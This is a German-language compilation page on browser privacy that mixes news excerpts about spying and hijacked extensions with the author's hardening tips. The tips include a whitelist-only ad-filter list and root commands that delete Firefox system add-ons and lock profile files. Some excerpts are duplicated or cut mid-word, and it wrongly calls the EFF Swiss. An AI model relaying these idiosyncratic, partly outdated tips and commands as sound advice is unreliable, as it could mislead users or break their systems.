Chrome oder Firefox einfach um zusätzliche Funktionen erweitern. Doch die kleinen Programme sind mächtiger als man glaubt - und werden zum Teil von dubiosen Firmen aufgekauft und missbraucht. [...] Doch den Einsatz der Erweiterungen sollte man sich genau überlegen. Das rät der etablierte Sicherheits-Experte Brian Krebs. Der Anlass ist ein aktueller Fall. Völlig aus blauem Himmel war die Webseite der US-Gesundheitsversicherer Blue Shield of California von mehreren Antivirenprogrammen als bösartige Seite markiert worden, berichtet Krebs in seinem Blog. Bei einer Untersuchung stellte man fest, dass eine Browsererweiterung Schuld war, die einer der Seiten-Entwickler sich heruntergeladen und in seinem Chrome-Browser installiert hatte. Umbau zur Werbeschleuder Die schuldige Erweiterung Page Ruler soll Entwicklern helfen, die Größe von Bildern und andere Elementen auf von ihnen erstellten Webseiten korrekt einzuschätzen. Die etwa 400.000 Mal installierte Erweiterung war eigentlich mit guten Absichten erstellt worden. Das Problem: Der Entwickler hatte sie irgendwann an eine Werbefirma verkauft - und die hatte daraus ein Schadprogramm gemacht, das heimlich Werbeeinblendungen auf damit erstellten Webseiten einbaut. Die Antivirenprogramme hatten auf den untergeschmuggelten Programmcode reagiert und eine unschuldige Firma galt auf einmal als gefährlich. Der Vorfall zeige ein ganz grundlegendes Problem der Erweiterungen, argumentiert Krebs. Zum einen seien sie oft deutlich mächtiger, als die meisten Nutzer ahnten. So können sie mit den richtigen Berechtigungen alles mitlesen, was im Browser geschieht oder den Nutzer auf andere Webseiten wie Fakeshops umleiten. Zum anderen seien die oft von Hobby-Entwicklern irgendwann mal zusammengeschusterten und nicht mehr gepflegten Erweiterungen anfällig, von Werbefirmen aufgekauft zu werden. Die Firmen bekommen so ein bereits etabliertes Programm, der Entwickler verdient an einem Projekt, um das er sich ohnehin nicht mehr gekümmert hatte. https://www.stern.de/digital/computer/sicherheits-experte-warnt-- darum-sollten-sie--fast--keine-browser-erweiterungen-nutzen-9172600.html Millionen Nutzer betroffen: 500 Chrome-Erweiterungen spionieren Surfdaten aus, CHIP, 14.02.2020 Browser-Erweiterungen sind bei vielen Nutzern beliebt, weil sie damit nützliche Funktionen nachrüsten können. Auf der anderen Seite sorgen die Zusatz-Tools für Chrome und Firefox immer wieder für Datenskandale. Das passiert leider viel zu häufig, sodass man das auch schnell wieder vergisst und zur Tagesordnung übergeht: Zur Erinnerung, im letzten Jahr wurden 4 Millionen Nutzer durch Browser-Erweiterungen ausspioniert, Firefox war davon zwar auch betroffen, aber hauptsächlich hat es Chrome-Nutzer erwischt. Jetzt deckten Sicherheitsexperten eine noch größere Sache auf: Über 500 Chrome-Erweiterungen haben Nutzerdaten angezapft und Werbung in den Browser eingeschleust. https://www.chip.de/news/Millionen-Nutzer-betroffen-500-Chrome-Erweiterungen-spionieren- Surfdaten-aus_181480214.html Fake-Adblocker saugten Daten von 20 Millionen Nutzern ab, netzpolitik.org, 19.04.2018 Mehrere als Adblocker getarnte Spähprogramme saugten die Daten von über 20 Millionen Nutzern ab, ergab eine Untersuchung des Adblocker-Anbieters Adguard. Die Browser-Erweiterungen waren im Web-Store von Chrome erhältlich. Adblocker filtern normalerweise Werbebanner auf Webseiten aus und schützen zudem gegen betrügerische Einschaltungen und unfreiwillige Überwachung durch Tracking. Doch die betreffenden Erweiterungen hatten den umgekehrten Effekt. Über den Fall berichtet t3n: Aufgefallen war das dem Werbeblocker-Anbieter Adguard, dessen Team gleich fünf solcher schadhaften Fake-Werbeblocker in Chromes Web-Store aufgespürt hat. Insgesamt kamen die Erweiterungen auf mehr als 20 Millionen Nutzer. Nachdem Adguard Google darüber informiert hat, wurden die Erweiterungen aus dem Web-Store entfernt. Habt auch ihr eine der folgenden Erweiterungen installiert, solltet ihr sie sofort entfernen: Adremover for Google Ublock Plus Adblock Pro HD for Youtube Webutation https://netzpolitik.org/2018/fake-adblocker-saugten-daten-von-20-millionen-nutzern-ab/ Fake-Adblocker saugten Daten von 20 Millionen Nutzern ab, netzpolitik.org, 19.04.2018 Mehrere als Adblocker getarnte Spähprogramme saugten die Daten von über 20 Millionen Nutzern ab, ergab eine Untersuchung des Adblocker-Anbieters Adguard. Die Browser-Erweiterungen waren im Web-Store von Chrome erhältlich. Adblocker filtern normalerweise Werbebanner auf Webseiten aus und schützen zudem gegen betrügerische Einschaltungen und unfreiwillige Überwachung durch Tracking. Doch die betreffenden Erweiterungen hatten den umgekehrten Effekt. Über den Fall berichtet t3n: Aufgefallen war das dem Werbeblocker-Anbieter Adguard, dessen Team gleich fünf solcher schadhaften Fake-Werbeblocker in Chromes Web-Store aufgespürt hat. Insgesamt kamen die Erweiterungen auf mehr als 20 Millionen Nutzer. Nachdem Adguard Google darüber informiert hat, wurden die Erweiterungen aus dem Web-Store entfernt. Habt auch ihr eine der folgenden Erweiterungen installiert, solltet ihr sie sofort entfernen: Adremover for Google Ublock Plus Adblock Pro HD for Youtube Webutation https://netzpolitik.org/2018/fake-adblocker-saugten-daten-von-20-millionen-nutzern-ab/ Datenschutz Studie: Firmen tracken Nutzer*innen trotz Adblockern, netzpolitik.org, 16.08.2018 Ein kürzlich veröffentlichter Forschungsartikel zeigt, wie schnell und weitreichend Nutzungsdaten im undurchsichtigen Netzwerk der Online-Werbeindustrie verbreitet werden. Das hat auch Folgen für die Wirksamkeit von Adblockern: In Sachen Datenschutz können sie großen Tracking-Akteuren wie Google und Co. nicht viel entgegensetzen. Netzwerk aus Knoten und Kanten Die Online-Werbeindustrie ist ein komplexes Geflecht aus vernetzten Akteuren Über die letzten zwei Jahrzehnte ist rund ums Online-Marketing eine hochentwickelte Ind Datenschutz Studie: Firmen tracken Nutzer*innen trotz Adblockern, netzpolitik.org, 16.08.2018 Ein kürzlich veröffentlichter Forschungsartikel zeigt, wie schnell und weitreichend Nutzungsdaten im undurchsichtigen Netzwerk der Online-Werbeindustrie verbreitet werden. Das hat auch Folgen für die Wirksamkeit von Adblockern: In Sachen Datenschutz können sie großen Tracking-Akteuren wie Google und Co. nicht viel entgegensetzen. Netzwerk aus Knoten und Kanten Die Online-Werbeindustrie ist ein komplexes Geflecht aus vernetzten Akteuren Über die letzten zwei Jahrzehnte ist rund ums Online-Marketing eine hochentwickelte Industrie entstanden, die große Gewinne aus der Extraktion und Analyse von User-Daten schöpft. Doch wo diese Datenströme fließen und wer sich Daten abzwackt, ist für Außenstehende völlig intransparent. Zwei Forscher an der Northeastern University in Boston haben nun versucht, das komplexe Firmengeflecht der Online-Werbung nachvollziehbar zu machen. Ihre Studie [pdf] liefert spannende Einsichten in den Aufbau und die internen Abläufe der Online-Werbeindustrie. Wir finanzieren uns fast vollständig aus Spenden von Leserinnen und Lesern. Unterstütze unsere Arbeit mit einer Spende oder einem Dauerauftrag. Besonders beunruhigend sind die Ergebnisse mehrerer Simulationen, mit denen die Wirksamkeit von fünf Adblocking-Strategien im Hinblick auf die Privatsphäre von Nutzer*innen getestet wurde. Die populäre Browser-Erweiterung Adblock Plus etwa verhindert in der Standardeinstellung die Verbreitung der Daten ihrer Nutzer*innen nicht, weil wesentliche Werbebörsen aufgrund der Sonderregeln für akzeptable Werbung nicht blockiert werden: "Adblock Plus hat überhaupt keinen Effekt, es ist kein Stück besser als gar nicht zu blocken", so Muhammad Ahmad Bashir, Co-Autor der Studie, kürzlich in einem Vortrag. Die besten Ergebnisse wurden mit Disconnect erzielt, das die Privatsphäre deutlich erhöht. Trotzdem: Auch die stärksten Blocking-Strategien verhindern der Studie zufolge nicht, dass Personen in 40-80 Prozent der Fälle zumindest von den einflussreichsten Unternehmen beobachtet werden, wenn sie eine Webseite besuchen. [...] Google besetzt die wichtigsten Knoten im Datennetzwerk Die jeweils 10 Knoten mit der höchsten Betweenness-Zentralität und dem besten PageRank Alle Rechte vorbehalten Screenshot Die Rolle dieser wenigen Firmen, die zentrale Schnittstellen im Werbenetzwerk darstellen, haben die Forscher noch einmal gesondert untersucht. Welche Bedeutung einzelne Knoten im Netzwerk haben, kann durch die Berechnung verschiedener Zentralitätsmaße analysiert werden. Ist ein Knoten eine zentrale Schaltstelle, über die viele kürzeste Wege zwischen zwei Knoten führen, so hat er eine hohe Betweenness-Zentralität. Solche Knoten sind in der Online-Werbung wichtig zur Weiterleitung von beispielsweise Tracking-Informationen. Die entsprechenden Unternehmen leiten besonders viele Daten an andere Akteure weiter, können also besonders viele Informationen einsehen. Der PageRank-Algorithmus, der ursprünglich von den Google-Gründern Page und Brin zur Sortierung von Suchergebnissen entwickelt wurde, wurde in der Studie zur Analyse der Relevanz einzelner Akteure herangezogen. Die Methode gewichtet die Knoten dahingehend, wie viele "wichtige Freunde" sie haben. Hat ein Knoten besonders viele eingehende Kanten von Knoten, die selbst viele eingehende Kanten haben, rutscht er auf der PageRank-Skala nach oben. Ein hoher PageRank weist darauf hin, dass das entsprechende Unternehmen besonders viele User-Informationen erhält, oder viele Auktionen an Werbebörsen gewinnt. Unter den 20 Akteuren mit den höchsten Betweenness-Werten und PageRanks finden sich prominente Online-Werbeunternehmen wie AppNexus (adnxs), Facebook und Integral Ad Science (adsafeprotected). Die wichtigsten Plätze nimmt jedoch Google mit seinen verschiedenen Domains (inklusive DoubleClick und 2mdn) ein. Der kalifornische Datenkonzern ist damit der unangefochtene Tracking-König. Dadurch, dass das Unternehmen gleich mehrere zentrale Knotenpunkte stellt, gibt es an ihm praktisch kein Vorbeikommen. Gängiges Adblocking schützt nicht vor den Big Playern Neben der Analyse der Netzwerkparameter wurden verschiedene Szenarien auf dem Netzwerk simuliert. Die Szenarien unterschieden sich darin, dass unterschiedliche Annahmen über den Datenaustausch zwischen den einzelnen Akteuren getroffen wurden. Das Ziel der Simulationen: Herauszufinden, wie sichtbar ein User für verschiedene Akteure der Werbeindustrie ist und wie viel er diesen durch Adblocking entgegensetzen kann. In Simulationen ohne Adblocking konnten 52 Unternehmen jeweils in mindestens 91% der Fälle beobachten, wenn ein durchschnittlicher User eine Webseite besucht (gemessen wurde die Sichtbarkeit von Ad Impressions im Netzwerk). 636 Unternehmen beobachteten mindestens 50% der Webseitenbesuche. Selbst im Szenario mit den strengsten Annahmen über den Datenaustausch erreichten die 10 größten Unternehmen 89-99% der Ad-Impressions. Fast alle Informationen darüber, welche Webseiten im Internet aufgerufen werden, erreichen also die großen Werbefirmen. Für die Simulationen mit Adblockern wurden verschiedene Knoten im Netzwerk blockiert. Der Marktführer Adblock Plus wurde mithilfe der Acceptable-Ads-Whitelist (.txt) und der EasyList-Blacklist (.txt) imitiert. In allen drei Szenarien unterschieden sich die Ergebnisse für Adblock Plus nur unwesentlich von der No-Blocking-Simulation. Disconnect und Ghostery schnitten deutlich besser ab, aber gegen einige Unternehmen können auch sie nicht viel ausrichten. 40-80% des Browsing-Verhaltens bleiben ungeschützt, je nach Adblocker und Vorannahmen im Szenario. https://netzpolitik.org/2018/studie-firmen-tracken-nutzerinnen-trotz-adblockern/ Spotify droht Adblocker-Nutzern mit Sperrung, PC-WELT.de, 08.02.2019 In den aktualisierten Nutzungsbedingungen warnt Spotify vor der Nutzung von Adblockern. Es drohen Konsequenzen. https://www.pcwelt.de/a/spotify-droht-adblocker-nutzern-mit-sperrung,3463982 Das Update der OpenSource-Firefox-Erweiterungen für Pale Moon, Firefox-ESR und Tor-Browser (abermals Firefox ESR) bleibt fürs sichere Surfen in jedem Fall unabdinglich mit
Der Private Modus kann über Einstellungen in Firefox abgeschaltet sein. Wir surfen dann also scheinbar im Normalen Modus. Private TAB sorgt auf Wunsch trotzdem fü,r seine Einschaltung. Ebenso haben wir an user.js u.a. von KaiRaven, die DNS (prioritätisch lokal, dann remote und pdnsd) bzw. der hosts-Datei ganz unten und Linfw3 und Firejail gedacht. Inkognito-Modus: Privatsphäre beim Surfen schützen, PC-WELT.de, 03.11.2019 Sowohl der Windows-10-Browser Edge als auch Google Chrome und Firefox bieten einen Modus, der beim Surfen keinerlei Spuren auf dem PC zurücklässt. So nutzen Sie ihn zuverlässig. Sobald Sie in den privaten Surfmodus wechseln, werden alle beim Besuch von Webseiten zwischengespeicherten Informationen wie Cookies, Verkaufsprotokolle, Web-Cache, Bilder und Videos beim Schließen des Browsers gelöscht. Besonders interessant ist das, wenn Sie auf einem fremden Rechner im Web unterwegs sind und keine Spuren hinterlassen möchten. Aber auch am eigenen PC ist das private Surfen praktisch, denn das Löschen Ihrer Surfdaten am Ende einer Internet-Sitzung erschwert es den Betreibern von Webseiten, Nutzerprofile anzulegen. [...] Beachten Sie, dass Sie im privaten Surfmodus nicht anonym im Internet unterwegs sind. Ihr Internetprovider, der Administrator des Routers in Wohngemeinschaften oder der Netzwerkadministrator im Firmennetz kann nach wie vor auswerten, welche Seiten Sie besucht, welche Links Sie angeklickt und welche Daten Sie übermittelt haben. https://www.pcwelt.de/a/inkognito-modus-privatsphaere-beim-surfen-schuetzen,3450334 Alles, was man nun neben der Installation aller aufgelisteten Erweiterungen und mit dem Entscheid für SecretAgent als auserwählte UserAgent-Erweiterung tun muss, ist Erweiterungen konfigurieren, den Browser starten und mit der rechten Maustaste auf das erste TAB klickend ein private TAB (für den privaten Modus) öffnen, bevor das Surfen im Internet direkt los geht: private TAB -> Let´s surf! Während des Surfens ist nach jedem Aufruf einer Webseite noscript und RequestPolicyBlockContinued auf das Vorkommen von neuen Tracking-Scripts hin zu überprüfen, um sie frei Wahl herauszufiltern oder zu belassen. Sollte die Webseite Cookies abverlangen, sind sie mit dem CookieController auf ihr zuzulassen. Die Webseite lädt sich danach von selbst noch einmal. Der Filter von ABP ist bei "javascript.enabled false" bei Firefox-ESR leider bis zur Aktivierung von JavaScript über "javascript.enabled true" nicht mehr aktiv und nicht mehr erkenntlich, bei Pale Moon bleibt er hingegen unverändert sichtbarer und filternder Bestandteil von ABL. Auch die aufgeflisteten Erweiterungen arbeiten unter "javascript.enabled true" besser. Erweiterungen für Pale Moon (und teilweise Firefox): https://addons.palemoon.org/extensions/ Weitere Extensions insbesonders für Firefox Quantum: Software::Browser Mozilla stellt Add-ons für den Schutz der Privatsphäre vor, PRO LINUX, 10.08.2018 Für viele Anwender sind die verfügbaren Erweiterungen ein Grund, Firefox als Browser zu benutzen. Mozilla stellt im Blog Erweiterungen für den Schutz der Privatsphäre vor. Nachdem unter Firefox Quantum und WebExtension-APIs nicht mehr alle Erweiterungen verfügbar sind, stellt Mozilla jetzt in seinem Blog ein gutes Dutzend Erweiterungen zum Schutz der Privatsphäre vor, die auch in der neuen Firefox-Ära funktionieren. Auch auf Mozillas Webseite für Add-ons sind diese unter dem Stichwort "Privacy Matters" zusammengefasst worden. Dort können sie nach Alter, Beliebtheit oder auch alphabetisch geordnet werden. In dieser Sortierung macht Bloody Vikings! den Anfang. Anstatt eine reale E-Mail-Adresse auf Webseiten zu nutzen, klickt der Anwender mit der rechten Maustaste auf das dafür vorgesehene Eingabefeld und wählt "Bloody Vikings!" aus. Das Add-on fügt automatisch eine temporäre E-Mail-Adresse ein und öffnet das entsprechende Postfach in einer neuen Registerkarte im Hintergrund. Dafür stehen die Dienste 10minutemail und anonbox zur Verfügung. Mit Cookie AutoDelete lassen sich Cookies kontrollieren. Wird ein Tab geschlossen, werden nicht verwendete Cookies automatisch gelöscht. Cookies, denen der Nutzer vertraut, können ausgenommen werden. Dieses Add-on funktioniert jetzt auch mit Firefox Multi-Account-Containern. Decentraleyes ist eine Ergänzung für Tracking Blocker. Es schützt vor Nachverfolgung bei derzentralen Bereitstellung von Inhalten, etwa durch CDNs. Dabei verhindert das Add-on, dass viele Anfragen nicht in die "Content Delivery Networks" gelangen, und stellt gleichzeitig lokale Dateien zur Verfügung, um zu verhindern, dass Websites nicht korrekt dargestellt werden. Ebenfalls der Verhinderung von Nachverfolgung dient Disconnect. Es blockiert unsichtbare Tracker und visualisiert diese gleichzeitig. Dabei können Seiten auch manuell von Schutz ausgenommen werden. In die gleiche Kerbe haut Disconnect for Facebook, wobei hier Facebook daran gehindert wird, besuchte Webseiten zu tracken, indem es Facebook-bezogene Anfragen von Webseiten Dritter blockiert. Dabei bleibt das Facebook-Konto weiterhin ohne Einschränkung nutzbar. Das gleiche Ziel verfolgt auch Facebook Container, indem es das Surf-Verhalten von Facebook isoliert. Firefox Multi-Account Containers ermöglicht separate Container in Firefox für verschiedene Lebensbereiche. So können Arbeit, Privatleben und andere Bereiche getrennt in Containern in der gleichen Firefox-Instanz laufen. Dabei sind Cookies auf den Container beschränkt, in dem sie geöffnet wurden. DuckDuckGo Privacy Essentials bietet die wichtigsten Eckpunkte, um die Kontrolle über die persönlichen Daten zu übernehmen: Tracker-Blockierung, intelligentere Verschlüsselung, private Suche per DuckDuckGo und vieles mehr. History Cleaner löscht den Browser-Verlauf nach einer vom Nutzer festgelegten Spanne von Tagen. Link Cleaner dagegen sorgt für kürzere URLs zum Kopieren durch die Entfernung von überflüssigen Tracking-Parametern. Zu den bekannteren Add-ons in dieser Sammlung zählt Privacy Badger der schweizer Bürgerrechtsorganisation Electronic Frontier Foundation (EFF). Es lernt automatisch, unsichtbare Tracker zu blockieren. Anstatt Listen darüber zu führen, was zu blockieren ist, lernt Privacy Badger, indem es beobachtet, welche Domains den Nutzer beim Surfen verfolgen. Privacy Possum dagegen sorgt dafür, das Werbenetzwerke beim Tracking durch Verkürzung und Verfälschung wertlose Informationen erhalten. Smart HTTPS hilft dabei, das sichere HTTPS-Protokoll zu verwenden, wenn es vom Server unterstützt wird. Es ändert automatisch das HTTP-Protokoll in das sichere HTTPS. Tritt beim Laden ein Fehler auf, kehrt es zum HTTP-Protokoll zurück. Dem Schutz vor Malware und präparierten Webseiten dient Web Security, indem es fortschrittliche Echtzeitschutztechnologien sowie eine umfangreiche Datenbank verwendet, um zu verhindern, dass Webseiten sensible Daten abschöpfen können. https://www.pro-linux.de/news/1/26183/mozilla-stellt-add-ons-f%C3%BCr-den-schutz-der-privatsph%C3%A4re-vor.html Software::Browser Mozilla schützt Firefox ( gt;68 ) besser gegen Fingerprinting und Krypto-Mining, PRO-LINUX, 10.04.2019 Mozilla fügt in Firefox einen erweiterten Schutz gegen Tracking durch Fingerprinting und gegen Krypto-Mining ein. https://www.pro-linux.de/news/1/26958/mozilla-sch%C3%BCtzt-firefox-besser-gegen-fingerprinting-und-krypto-mining.html Integrierter Schutz vor Cross-Site-Tracking: Firefox >= 64 Plugins: Nur mplayerplugin. Nicht zu vergessen sind möglicherweise Versions-Sprachdateien. Genau diese Erweiterungen und Plugins sind von Jondofox empfohlen worden und in Jondofox bereits integriert (alles gibt es oft auch als separate rpm). Firefox: verschiedene Zertifikat-Fehler mit Meldungen Problem: Ein selbst-signiertes Zertifikat lässt sich nicht dauerhaft speichern, die Option "Diese Ausnahme dauerhaft speichern" ist ausgegraut. Dies betrifft z.B. die Schulkonsole oder das Moodle, wenn es über https aufgerufen wird. U.U. funktioniert auch eine frühere Variante, bei der man die Zertifikate über "Einstellungen -> Erweitert ->Zertifikate" einpflegen konnte, nicht mehr. Ursache: Im privaten Modus speichert Firefox sowohl eine Chronik als auch Zertifikate nicht dauerhaft. Lösung: Die Einstellung "browser.privatebrowsing.autostart" muss auf "false" stehen, um das dauerhafte Speichern der Zertifikate zu ermöglichen. Im Browser als URL eingeben: "about:config" und als Suchbegriff "private". Dann bei "browser.privatebrowsing.autostart" den Wert auf "false" setzen. Jetzt ist dauerhaftes Speichern wieder möglich. https://www.linuxmuster.net/wiki/anwenderwiki:firefox:ausnahmeregeln Root-Zertifikate aus aller Welt zum Importieren (Klick auf PEM (automatisch), JSON, txt): https://ssl-tools.net/certificates und rpm: ca-certificates and rootcertificates. Wir wiederholen in diesem Zusammenhang noch einmal folgenden Fall: [ SOLVED by Gooken ]: Bei jedem Webseiten-Aufruf sind Zertifkate auch im Falle der Dauerhaftigkeit neu zu bestätigen. cd /etc/pki/tls/certs und eneuere die ins Leere oder auf entfernte Stelle verweisende ca-bundle.crt, indem die Sicherung oder desgleichen aus demselben Verzeichnis auf sie kopiert wird: cp -fp ca-bundle.crt.rpmnew ca-bundle.crt. Firefox (gecko): System Add-ons Packaged with Firefox are a bunch of system add-ons which are installed without your consent and they are essentially hidden (they are not listed in about:addons). Some of these add-ons have been and may currently be used for controversial purposes such as collecting data about how users interact with search engines, the browser, etc.. Typically i remove all of them, however you may want to keep some them after researching what they do and whether they preserve your privacy. On Linux these add-ons may be found at /usr/lib/firefox/browser/features and for Windows in \Program Files (x86)\Firefox\browsereatures or \Program Files\Firefox\browsereatures. You can delete them in Linux using the terminal: cd /usr/lib/firefox/browser/features sudo rm *.xpi https://12bytes.org/articles/tech/firefox/firefoxgecko-configuration-guide-for-privacy-and-performance-buffs Firefox (gecko): Verhindere Supercookies Verhindere das Tracken mit in Supercookies vorhandenden FF-Erweiterungs-ID, indem man ihren Inhalt löscht und ihre Dateien durcht "chattr +i" unlesbar (integer, unveränderbar) macht: echo "" >> /home/surfuser/.mozilla/firefox/profile.default/SiteSecurityServiceState.txt chattr +i /home/surfuser/.mozilla/firefox/profile.default/SiteSecurityServiceState.txt echo "" >> /home/surfuser/.mozilla/firefox/profile.default/SiteSecurityServiceState.old chattr +i /home/surfuser/.mozilla/firefox/profile.default/SiteSecurityServiceState.old https://12bytes.org/articles/tech/firefox/firefoxgecko-configuration-guide-for-privacy-and-performance-buffs Firefox (gecko): Search engines I recommend reading Firefox Search Engine Cautions and Recommendations, which offers information about how Mozilla monetizes Firefox with the https://12bytes.org/articles/tech/firefox/firefox-search-engine-cautions-and-recommendations source: https://12bytes.org/articles/tech/firefox/firefoxgecko-configuration-guide-for-privacy-and-performance-buffs Sicherheit mit Firefox (Gecko): weiterführende Links https://12bytes.org/articles/tech/firefox/firefoxgecko-configuration-guide-for-privacy-and-performance-buffs https://12bytes.org/articles/tech/firefox/the-firefox-privacy-guide-for-dummies https://12bytes.org/articles/tech/encrypting-dns-traffic https://12bytes.org/articles/tech/alternative-search-engines-that-respect-your-privacy https://www.ghacks.net/2015/08/18/a-comprehensive-list-of-firefox-privacy-and-security-settings/ http://kb.mozillazine.org/About:config_Entries http://anonymous-proxy-servers.net/en/jondofox.html https://developer.mozilla.org/en-US/docs/Web/API/IndexedDB_API/Browser_storage_limits_and_eviction_criteria https://browserleaks.com/webrtc https://www.ghostery.com/blog/ghostery-news/cookies-fingerprinting-co-tracking-methods-clearly-explained/ https://en.wikipedia.org/wiki/Cross-site_scripting https://www.mycryptopedia.com/crypto-mining-scripts/ https://www.mike-gualtieri.com/css-exfil-vulnerability-tester https://www.bleepingcomputer.com/news/security/css-is-so-overpowered-it-can-deanonymize-facebook-users/ https://developer.mozilla.org/en-US/docs/Web/API/Web_Storage_API https://www.theguardian.com/us-news/edward-snowden https://www.theatlantic.com/technology/archive/2017/03/encryption-wont-stop-your-internet-provider-from-spying-on-you/521208/ https://wordpress.org/plugins/evercookie/ https://filterlists.com/ https://www.techspot.com/guides/44-firefox2-tweak-guide/page16.html https://www.ghacks.net/2015/03/27/firefox-39-tracking-protection-for-private-browsing-mode/ https://www.mozilla.org/en-US/privacy/firefox/ https://wordpress.org/plugins/evercookie/ https://filterlists.com/ https://www.ghacks.net/2015/03/27/firefox-39-tracking-protection-for-private-browsing-mode/ https://support.mozilla.org/en-US/questions/1097368 https://www.mozilla.org/en-US/privacy/firefox/ https://github.com/pyllyukko/user.js/tree/master https://blog.mozilla.org/metrics/2012/09/21/firefox-health-report/ https://wiki.archlinux.org/index.php/Firefox/Privacy https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent/Firefox https://www.ghacks.net/2007/05/04/flash-cookies-explained/ https://www.google.com/intl/en/chrome/privacy/ https://www.ghacks.net/2014/06/02/block-automatic-connections-firefox-makes/ https://support.mozilla.org/en-US/questions/980227 https://tor.stackexchange.com/questions/4336/how-to-import-tor-browser-profile https://www.ghacks.net/2015/10/16/how-to-prevent-hsts-tracking-in-firefox/ https://support.mozilla.org/en-US/kb/how-stop-firefox-making-automatic-connections https://www.cookiebot.com/en/website-tracking/ https://www.sitepoint.com/html5-browser-storage-past-present-future/ https://www.ghacks.net/2015/01/22/improve-online-privacy-by-controlling-referrer-information/ https://archive.vn/99sDW https://www.lexology.com/library/detail.aspx?g=34ef3aca-bc16-425b-842a-e39ebea0d030 https://ip-check.info/?lang=en https://ip-check.info/description.php https://ipleak.net/ https://heimdalsecurity.com/blog/javascript-malware-explained/ https://en.wikipedia.org/wiki/List_of_HTTP_header_fields https://en.wikipedia.org/wiki/Man-in-the-middle_attack https://resources.infosecinstitute.com/means-and-methods-of-web-tracking-its-effects-on-privacy-and-ways-to-avoid-getting-tracked/ https://blog.mozilla.org/blog/2014/10/16/mozilla-and-telefonica-partner-to-simplify-voice-and-video-calls-on-the-web/ https://developer.mozilla.org/en-US/docs/Mozilla/Preferences/Mozilla_networking_preferences https://www.theregister.co.uk/2014/11/12/mozilla_google_financing/ https://www.google.com/intl/en/chrome/privacy/ https://micro.nicholaswilson.me.uk/post/65681505329/mozilla-vs-google-on-user-privacy-websockets https://wiki.mozilla.org/Privacy/Reviews/Necko https://developer.mozilla.org/en-US/docs/Web/API/Network_Information_API https://andreasgal.com/2014/10/14/openh264-now-in-firefox/ https://wiki.archlinux.org/index.php/Profile-sync-daemon https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-user-data https://blog.mozilla.org/nnethercote/2014/11/12/quantifying-the-effects-of-firefoxs-tracking-protection/ https://en.wikipedia.org/wiki/SPDY https://tails.boum.org/ https://www.vice.com/en_us/article/gv5jwj/the-fbi-is-classifying-its-tor-browser-exploit https://www.mozilla.org/en-US/about/manifesto/ https://medium.com/@optimiseordie/the-ultimate-guide-to-using-google-analytics-for-cross-device-optimisation-e56636b54618#.2y91ctpwy https://css-tricks.com/potential-dangers-of-third-party-javascript/ https://www.torproject.org/download/ https://support.mozilla.org/en-US/kb/what-happened-tracking-protection?redirectlocale=en-US&redirectslug=tracking-protection https://github.com/uBlock-LLC/uBlock/wiki https://www.howtogeek.com/180175/warning-your-browser-extensions-are-spying-on-you/ https://en.wikipedia.org/wiki/Web_storage https://www.makeuseof.com/tag/what-are-supercookies-and-why-are-they-dangerous/ https://www.ctrl.blog/entry/firefox-fpi.html https://archive.is/20180823134103/ https://wholeftopenthecookiejar.eu/static/tpc-paper.pdf https://restoreprivacy.com/browser-fingerprinting/ https://restoreprivacy.com/ https://restoreprivacy.com/firefox-privacy/ https://restoreprivacy.com/antivirus-privacy/ https://restoreprivacy.com/cyber-security-statistics/ https://restoreprivacy.com/vpn-vs-tor/ https://restoreprivacy.com/contact/ Secure email: Tutanota or ProtonMail, https://tutanota.com/, https://restoreprivacy.com/go/protonmail https://restoreprivacy.com/contact/ Secure Messenger: Wire or Signal, https://wire.com/, https://signal.org/ Der schnelle Linux-Standard-Browser Konqueror mit dem von uns erstellten, importierbarer Konqueror-Werbefilterliste, tuts allerdings auch.. ( für die erst seit geraumer Zeit eingeführe TLS-Verschlüselung.bedarf es jedoch einer aktuellen Version von Konqueror. Und so wird mit einem Adblocker bzw. Werbeblocker wie AdblockPlus bzw. ABL und dem Werbeblocker von Konqueror sicher geblockt: Zunächst entfernen wir aus AdblockPlus oder desgleichen sämtliche (meist Ausnahme-Regeln enthaltende)Listenblocker wie easylist usw. und tragen den Haken für Sonderregelungen (weitere Ausnahme-Regeln) aus. Verboten sei nun wieder (wie bei unserer Firewall linfw3), was nicht (ausdrücklich) erlaubt ist. Setze den einzig vorhandenden (privaten) Adfilter bzw. Werbefilter mit nur ein paar Einträgen wie folgt: @@*.css* @@||*.html* ||*.js/* ||*.com/* ||*.net/* ||*.de/* ||*.pl/* * oder ganz einfach nur ein einziger Eintrag * (ausgesprochen: STERN) für zunächst buchstäblich ALLES. Das wars schon: FERTIG! Oder zusätzlich noch einer für die Stylesheets: "css: @@*.css" gleich an der Spitzenposition der Filterliste (als erstes Element). Nur Risikofreudige ergänzen noch mit @@*.jpg* und @@*.png*, @@*.jpeg* und @@*.gif*, da andere Extensions etwaige Webbugs (Skripte mit Bildausgabe) bereits herausfiltern, die in ABP (bzw. ABL) nach und nach als Ausnahmen wieder freigegeben werden können: Kein Bedarf mehr an externen und dauernd zu aktualisierenden Filterlisten mit ihren zahlreichen Ausnahmen wie EasyList usw.! Mehr Einträge werden gar nicht benötigt! Ein einziger Stern "*" reicht also völlig aus. Die ABP- bzw. ABL-Filerliste sieht zu Beginn nun insgesamt (als unsere Endlösung für ABP bzw. ABL) wie folgt aus: ABP (Firefox <= ESR 52.9.0) @@*.png* @@*.css* @@||*.html* @@||*.gif* @@||*.jpeg* @@||*.jpg* @@||*.svg* *.js* *.pl* * ABL (Pale Moon 28.1.0): @@*.png @@*.css @@*.html* @@*.gif @@*.jpeg @@*.jpg @@*.svg * *.js *.pl * und keine weiteren Einträge. Runter also mit den importierbaren Adblock-Listen wie z.B. die so einige Ausnahmen und lauter überflü,ssige Regeln beinhaltende EasyList! Die wenigen Schneckentempo-Filter nehmen so noch keine Geschwindigkeit! Um beim Laden einer beliebigen Webseite zu erkennen, was man erkennen möchte, gilt es nun nach und nach, Ausnahmeregeln hinzuzufügen, was sowohl bei AdblockPlus als auch dem präzisen Werbeblocker von Konqueror auf einfache Art und Weise möglich ist. Zunächst werden alle Javascript gleich mit geblockt. Um künftig auf Nummer sicher zu gehen, kann man zum * noch *.js* und *.pl* hinzufügen (in unserer Liste oben bereits der Fall). Nun, sollte obiger css-Eintrag fehlen, gilt es, i.a. die formgebenden Stylesheets vom Typ css wieder zu erlauben. Werden Bilder nicht angezeigt weil obige Ausnahmen fehlen, muss man sie über Einträge mit Wildcards wie "https://.../*.jpg" und "https://.../*.png" explizit freigeben. Man gebe dabei von einer Webseite auf keinen Fall mehr frei, als man wirklich braucht. Nun sind die Einstellungen (Regeln) für eine Webseite zum Glück dauerhaft gespeichert. Abschließend gilt es nur 